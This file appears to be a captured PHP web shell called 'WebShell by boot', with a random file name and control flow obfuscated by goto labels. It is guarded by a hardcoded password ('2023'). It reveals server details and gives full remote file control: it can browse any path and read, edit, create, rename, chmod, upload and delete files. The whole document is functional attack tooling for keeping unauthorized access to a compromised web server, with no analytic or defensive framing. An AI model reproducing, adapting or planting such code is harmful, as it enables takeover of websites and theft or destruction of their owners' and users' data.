View file File name : iujwAo.php Content :<?php goto E2f; a27: if ($can_read) { ?>style="color:green;"<?php } else { ?>style="color:red;"<?php } goto E1a; A90: ?></p> <p> <a href="?path=<?php goto A86; E1f: error_reporting(0); goto a39; Df2: if ($type == 1) { $now_path = $path; } goto c8c; E1a: ?>>Readable</span> | <span <?php goto c95; c07: $can_write = false; goto e20; D27: ?></p> <p>User: <?php goto Fe8; eca: $can_read = false; goto E15; Bc7: @set_time_limit(0); goto E1f; E36: if ($_SESSION['kk'] != '2023') { echo 'kk'; exit; } goto C2c; c3b: if (!isset($_SESSION['kk'])) { $_SESSION['kk'] = $_REQUEST['kk']; } goto E36; C91: echo PHP_OS; goto Bf8; F66: $now_url = $web_url . $sy_path; goto e2f; E15: if (is_readable($now_path)) { $can_read = true; } goto c07; e20: if (is_writable($now_path)) { $can_write = true; } goto E8b; A6b: echo $data['SERVER_SOFTWARE']; goto D1a; C2c: $type = $_REQUEST['type']; goto f2d; A86: echo $website_path; goto Af7; a39: session_start(); goto c3b; Bf8: ?></p> <p>Website: <?php goto ebc; d5e: if ($type == 2 || $type == 3) { goto E8; c1: ?></textarea> </div> <button type="submit" class="btn btn-success">Edit</button> </form> </div> <?php goto c0f; f2: ?> <div class="row"> <form action="?type=3" method="post"> <input type="hidden" id="path" name="path" value="<?php goto af; Da: ?>"/> <div class="form-group"> <?php goto d5; d5: $content = file_get_contents($file_path); goto A2; cb: echo htmlspecialchars($content); goto c1; E8: if ($type == 3) { goto De; e8: $content_result = file_put_contents($path, $file_content); goto b8; b8: if ($content_result) { echo '<div class="alert alert-success" role="alert">修改文件内容成功!</div>'; } else { echo '<div class="alert alert-danger" role="alert">修改文件内容失败!</div>'; } goto de; De: $file_content = $_REQUEST['file_content']; goto e8; de: } goto f2; af: echo $file_path; goto Da; A2: ?> <textarea class="form-control" id="exampleFormControlTextarea1" name="file_content" rows="20" cols="100"><?php goto cb; c0f: } else { if ($type == 4) { goto f8; Ac: ?>"> </div> <button type="submit" class="btn btn-success">Edit</button> </form> </div> <?php goto b2; E2: ?> <input type="text" class="form-control" id="file_new_name" name="file_new_name" value="<?php goto df; Ad: $content = file_get_contents($file_path); goto E2; B5: ?> <div class="row"> <form action="?type=4" method="post"> <input type="hidden" id="path" name="path" value="<?php goto b3; b3: echo $file_path; goto E1; Ca: if (!empty($file_new_name)) { $rename_result = rename($file_path, $now_path . '/' . $file_new_name); if ($rename_result) { echo '<div class="alert alert-success" role="alert">修改文件名称成功!</div>'; $file_path = $now_path . '/' . $file_new_name; } else { echo '<div class="alert alert-danger" role="alert">修改文件名称失败!</div>'; } } goto B5; E1: ?>"/> <div class="form-group"> <?php goto Ad; df: echo basename($file_path); goto Ac; f8: $file_new_name = $_POST['file_new_name']; goto Ca; b2: } else { if ($type == 5) { goto D0; D0: $new_chmod = trim($_POST['new_chmod']); goto d3; f5: ?>"> </div> <button type="submit" class="btn btn-success">Edit</button> </form> </div> <?php goto d4; c9: echo $old_chmod; goto f5; d3: if (!empty($new_chmod)) { if (chmod($file_path, octdec($new_chmod))) { echo '<div class="alert alert-success" role="alert">修改文件权限成功!</div>'; $old_chmod = $new_chmod; } else { echo '<div class="alert alert-danger" role="alert">修改文件权限失败!</div>'; } } else { $permissions = fileperms($file_path); $old_chmod = substr(sprintf('%o', $permissions), -4); } goto Ae; E5: $content = file_get_contents($file_path); goto Af; A1: echo $file_path; goto fc; fc: ?>"/> <div class="form-group"> <?php goto E5; Af: ?> <input type="text" class="form-control" id="new_chmod" name="new_chmod" value="<?php goto c9; Ae: ?> <div class="row"> <form action="?type=5" method="post"> <input type="hidden" id="path" name="path" value="<?php goto A1; d4: } else { if ($type == 6) { goto Ba; e2: ?> <div class="row"> <form action="?type=6" method="post"> <input type="hidden" id="path" name="path" value="<?php goto E3; Ba: $new_name = trim($_POST['new_name']); goto bc; ea: ?>"/> <div class="form-group"> <input type="text" class="form-control" id="new_name" name="new_name" value="<?php goto Bc; cf: ?>" placeholder="New File Name"> </div> <div class="form-group"> <textarea class="form-control" id="new_content" name="new_content" rows="20" cols="100" placeholder="New File Content"><?php goto ae; D5: if (!empty($new_name)) { if (is_file($now_path . '/' . $new_name)) { echo '<div class="alert alert-danger" role="alert">文件已经存在!</div>'; } else { $file = fopen($now_path . '/' . $new_name, 'w'); if ($file) { if (fwrite($file, $new_content)) { echo '<div class="alert alert-success" role="alert">文件创建成功!</div>'; } else { echo '<div class="alert alert-danger" role="alert">无法写入文件!</div>'; } fclose($file); } else { echo '<div class="alert alert-danger" role="alert">无法打开文件!</div>'; } } } goto e2; bc: $new_content = trim($_POST['new_content']); goto D5; E3: echo $file_path; goto ea; ae: echo htmlspecialchars($new_content); goto B2; B2: ?></textarea> </div> <button type="submit" class="btn btn-success">Create Now</button> </form> </div> <?php goto ee; Bc: echo $new_name; goto cf; ee: } else { if ($type == 7) { goto D2; D2: $new_name = trim($_POST['new_name']); goto c0; E4: echo $file_path; goto A9; C9: ?>" placeholder="New Folder Name"> </div> <button type="submit" class="btn btn-success">Create Now</button> </form> </div> <?php goto e9; c0: if (!empty($new_name)) { if (!is_dir($now_path . '/' . $new_name)) { if (mkdir($now_path . '/' . $new_name)) { echo '<div class="alert alert-success" role="alert">目录创建成功!</div>'; } else { echo '<div class="alert alert-success" role="alert">目录创建失败!</div>'; } } else { echo '<div class="alert alert-success" role="alert">目录已存在!</div>'; } } goto d7; A9: ?>"/> <div class="form-group"> <input type="text" class="form-control" id="new_name" name="new_name" value="<?php goto ef; ef: echo $new_name; goto C9; d7: ?> <div class="row"> <form action="?type=7" method="post"> <input type="hidden" id="path" name="path" value="<?php goto E4; e9: } else { goto Bf; ed: echo $file_path; goto B6; Fa: ?> </tbody> </table> </form> </div> <?php goto d2; F1: ?>&type=7">Create Folder</a> </form> </div> <form action="?path=<?php goto ed; E7: $file_list = sortByFolder($now_path, $file_list); goto e0; b1: echo $file_path; goto C2; A0: if ($_POST['act'] == 'del') { $delete_file_list = $_POST['childcheck']; if (!empty($delete_file_list)) { goto b9; b9: $count = 0; goto fd; fd: $fail_count = 0; goto f9; f9: foreach ($delete_file_list as $k => $v) { $del_result = unlink($v); if ($del_result) { $count++; } else { $fail_count++; } } goto C0; c5: if ($fail_count > 0) { echo '<div class="alert alert-danger" role="alert">删除' . $fail_count . '个文件失败!</div>'; } goto F6; C0: if ($count > 0) { echo '<div class="alert alert-success" role="alert">删除' . $count . '个文件成功!</div>'; } goto c5; F6: } } goto ab; Bf: ?> <?php goto A0; db: echo $file_path; goto F1; be: if (!empty($file_list) && count($file_list) > 2) { foreach ($file_list as $k => $v) { if (!($v == '.' || $v == '..')) { goto Df; F8: ?>&type=4">Rename</a> <a class="btn btn-info btn-xs" href="?path=<?php goto F4; a3: ?> </td> <td> <?php goto cc; F4: echo $file_url; goto Be; Df: $file_url = $now_path . '/' . $v; goto b4; cc: $permission = getFilePermission($file_url); goto Ef; B3: if (!is_dir($file_url)) { goto e3; a5: echo $now_url . '/' . $v; goto a8; a8: ?>" target="_blank">click visit</a> <?php goto f4; e3: ?> <a href="<?php goto a5; f4: } goto fe; C4: if (is_dir($file_url)) { echo '<a href="?path=' . $file_url . '&type=1" style="color: green;font-weight:bold;"> <i class="bi bi-folder" style="vertical-align: middle;"> <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-folder" viewBox="0 0 16 16"> <path d="M.54 3.87.5 3a2 2 0 0 1 2-2h3.672a2 2 0 0 1 1.414.586l.828.828A2 2 0 0 0 9.828 3h3.982a2 2 0 0 1 1.992 2.181l-.637 7A2 2 0 0 1 13.174 14H2.826a2 2 0 0 1-1.991-1.819l-.637-7a1.99 1.99 0 0 1 .342-1.31zM2.19 4a1 1 0 0 0-.996 1.09l.637 7a1 1 0 0 0 .995.91h10.348a1 1 0 0 0 .995-.91l.637-7A1 1 0 0 0 13.81 4H2.19zm4.69-1.707A1 1 0 0 0 6.172 2H2.5a1 1 0 0 0-1 .981l.006.139C1.72 3.042 1.95 3 2.19 3h5.396l-.707-.707z"/> </svg> </i>' . $v . '</a>'; } else { echo '<a href="?path=' . $file_url . '&type=2">' . $v . '</a>'; } goto da; fe: ?> </td> <td> <?php goto Eb; A4: $modificationTime = filemtime($file_url); goto d9; Ab: ?> </td> <td> <?php goto A4; a9: echo $file_url; goto F0; ec: echo $file_url; goto F8; Eb: if (is_dir($file_url)) { echo '<font color="green" style="font-weight: bold;">Directory</font>'; } else { echo getFileSize($file_url); } goto Ab; a1: ?> </td> <td> <a class="btn btn-primary btn-xs" href="?path=<?php goto ec; d9: echo date("Y-m-d H:i:s", $modificationTime); goto a3; Be: ?>&type=2">Edit</a> <a class="btn btn-warning btn-xs" href="?path=<?php goto b7; F0: ?>" name="childcheck[]"> </div> </th> <td> <?php goto C4; da: ?> </td> <td> <?php goto B3; dd: ?>&type=5">Chmod</a> </td> </tr> <?php goto ca; Ef: if (strpos($permission, 'w') !== false) { echo '<font color="green" style="font-weight: bold;">' . $permission . '</font>'; } else { echo '<font color="red" style="font-weight: bold;">' . $permission . '</font>'; } goto a1; b4: ?> <tr> <th> <div class="form-check"> <input class="form-check-input" type="checkbox" value="<?php goto a9; b7: echo $file_url; goto dd; ca: } } } else { ?> <tr> <td colspan="4" style="text-align: center;color:red;"> No Files! </td> </tr> <?php } goto Fa; B6: ?>" method="post"> <div class="col-12" style="margin-bottom: 1rem;"> <input type="hidden" name="act" value="del"/> <button type="submit" class="btn btn-danger btn-xs">Delete</button> </div> <table class="table table-bordered"> <thead> <tr> <th> <div class="form-check"> <input class="form-check-input" type="checkbox" value="1" id="allcheck" name="allcheck"> </div> </th> <th>Name</th> <th>Url</th> <th>Size</th> <th>Modify</th> <th>Permission</th> <th>Action</th> </tr> </thead> <tbody> <?php goto be; D7: ?>&type=6">Create File</a> <a class="btn btn-success btn-sm" href="?path=<?php goto db; ce: $file_list = scandir($now_path); goto E7; D9: echo $file_path; goto D7; ab: if ($_POST['act'] == 'upload') { $targetFile = $now_path . '/' . basename($_FILES["fileToUpload"]["name"]); if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) { echo '<div class="alert alert-success" role="alert">文件' . htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . '已上传!</div>'; } else { echo '<div class="alert alert-danger" role="alert">文件上传失败!</div>'; } } goto ce; C2: ?>" method="post" enctype="multipart/form-data"> <input type="hidden" name="act" value="upload"/> <input class="form-control form-control-sm" id="formFileSm" name="fileToUpload" type="file" style="width: 200px;display: inline-block;"> <button type="submit" class="btn btn-info btn-sm">Upload</button> <a class="btn btn-primary btn-sm" href="?path=<?php goto D9; e0: ?> <div class="row"> <div class="col-12" style="margin-bottom: 1rem;"> <form action="?path=<?php goto b1; d2: } } } } } goto B17; c85: $website_path = $data['DOCUMENT_ROOT']; goto cf0; Ff9: ?></p> <p>Server Software: <?php goto A6b; Af7: ?>">Project</a> </p> </div> <div class="row"> <p> Path: <?php goto ff7; e2f: ?> <!DOCTYPE html> <html lang="en"> <head> <title>WebShell by boot</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css"> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script> </head> <body> <div class="jumbotron text-center" style="padding: 1rem 0rem;"> <h1 style="font-size:2rem;font-weight: bold;margin: 1rem 0;">WebShell by boot</h1> </div> <div class="container"> <div class="row"> <p>Server IP: <?php goto a86; E2f: header('Content-Type: text/html; charset=utf-8'); goto Bc7; Aa6: function getFileSize($file_url) { goto ff3; ff3: $file_size = filesize($file_url); goto Fb6; e89: return $file_size; goto b3b; Fb6: if ($file_size > 1024 * 1024) { $file_size = round($file_size / (1024 * 1024), 2) . ' MB'; } else { if ($file_size > 1024) { $file_size = round($file_size / 1024, 2) . ' KB'; } else { $file_size = $file_size . ' B'; } } goto e89; b3b: } goto Cd0; E4a: if (!empty($path)) { $file_path = $path; $now_path = $path; } goto Df2; ff7: $file_now_path = ""; goto b30; ebc: echo $data['HTTP_HOST']; goto D27; c8c: $file_path_array = explode('/', $file_path); goto D00; c95: if ($can_write) { ?>style="color:green;"<?php } else { ?>style="color:red;"<?php } goto F63; c45: $now_path = dirname($file_path); goto a8e; B17: ?> </div> <script> $(function(){ $('#allcheck').click(function(){ if($('#allcheck').is(":checked")){ $('input[name="childcheck[]"]').each(function(){ $(this).attr('checked', true); }) }else{ $('input[name="childcheck[]"]').each(function(){ $(this).attr('checked', false); }) } }) }) </script> </body> </html> <?php goto Aa6; a86: echo $data['SERVER_ADDR']; goto Ff9; b30: foreach ($file_path_array as $k => $v) { goto d6; B7: ?> <?php goto A5; d8: if (empty($v)) { ?> <a href="?path=/">-</a> <?php } else { goto c6; Cf: $file_now_path = $file_now_path . "/" . $v; goto D3; D3: ?> /<a href="?path=<?php goto Cd; d0: echo trim($v); goto c4; c6: if (empty($file_now_url)) { $file_now_url = $v; } else { $file_now_url = $file_now_url . '/' . $v; } goto Cf; Cd: echo $file_now_path; goto A8; A8: ?>"><?php goto d0; c4: ?></a><?php goto A7; A7: } goto B7; d6: ?> <?php goto d8; A5: } goto Ca3; D00: if (!is_dir($now_path)) { $now_path = dirname($now_path); } goto eca; E8b: $sy_path = str_replace($website_path, '', $now_path); goto F66; a8e: $web_url = $data['REQUEST_SCHEME'] . "://" . $data['SERVER_NAME']; goto E4a; F63: ?>>Writeable</span> </p> </div> <?php goto d5e; Cd0: function getFilePermission($filename) { goto f11; cd5: $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-'); goto Acc; E88: $info .= $perms & 0x10 ? 'w' : '-'; goto cd5; Acc: $info .= $perms & 0x4 ? 'r' : '-'; goto Fac; a78: $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-'); goto c65; C1f: $perms = fileperms($filename); goto efc; cd6: return $info; goto E1b; B75: $info .= $perms & 0x100 ? 'r' : '-'; goto B28; efc: if (($perms & 0xc000) === 0xc000) { $info = 's'; } elseif (($perms & 0xa000) === 0xa000) { $info = 'l'; } elseif (($perms & 0x8000) === 0x8000) { $info = '-'; } elseif (($perms & 0x6000) === 0x6000) { $info = 'b'; } elseif (($perms & 0x4000) === 0x4000) { $info = 'd'; } elseif (($perms & 0x2000) === 0x2000) { $info = 'c'; } elseif (($perms & 0x1000) === 0x1000) { $info = 'p'; } else { $info = 'u'; } goto B75; f11: clearstatcache(true, $filename); goto C1f; B28: $info .= $perms & 0x80 ? 'w' : '-'; goto a78; c65: $info .= $perms & 0x20 ? 'r' : '-'; goto E88; Fac: $info .= $perms & 0x2 ? 'w' : '-'; goto c98; c98: $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-'); goto cd6; E1b: } goto f4d; f2d: $path = $_REQUEST['path']; goto C92; Ca3: ?> <span <?php goto a27; cf0: $file_path = $data['SCRIPT_FILENAME']; goto c45; C92: $data = $_SERVER; goto c85; D1a: ?></p> <p>OS: <?php goto C91; Fe8: echo get_current_user(); goto A90; f4d: function sortByFolder($now_path, $all_list) { goto E82; deb: foreach ($all_list as $k => $v) { if (is_dir($now_path . '/' . $v)) { $folder_list[] = $v; } else { $file_list[] = $v; } } goto cec; E82: $folder_list = array(); goto Ead; Daa: $all_list = array_merge($folder_list, $file_list); goto B91; Bcb: sort($file_list); goto Daa; Ead: $file_list = array(); goto deb; B91: return $all_list; goto Edc; cec: sort($folder_list); goto Bcb; Edc: }